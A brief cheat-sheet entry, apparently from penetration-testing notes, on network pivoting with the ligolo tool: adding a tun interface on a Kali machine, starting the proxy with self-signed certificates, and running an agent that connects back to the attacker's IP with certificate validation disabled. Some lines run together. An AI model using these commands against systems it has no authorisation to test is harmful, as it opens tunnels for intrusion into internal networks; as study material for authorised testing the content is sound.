Pivoting
# Adds a new tun interface to our machine.
sudo ip tuntap add user kali mode tun ligolo
# Enables the new interface.
sudo ip link set ligolo up# With the -selfcert flag the tool dynamically
# generates self-signed certificates.
./proxy -selfcert# The IP will be the IP of our Kali VM/attacking machine.
# The -ignore-cert ignores certificate validation.
# This means we won't have any issues with our self-signed certs.
./agent -connect <IP_KAL>I:11601 -ignore-certLast updated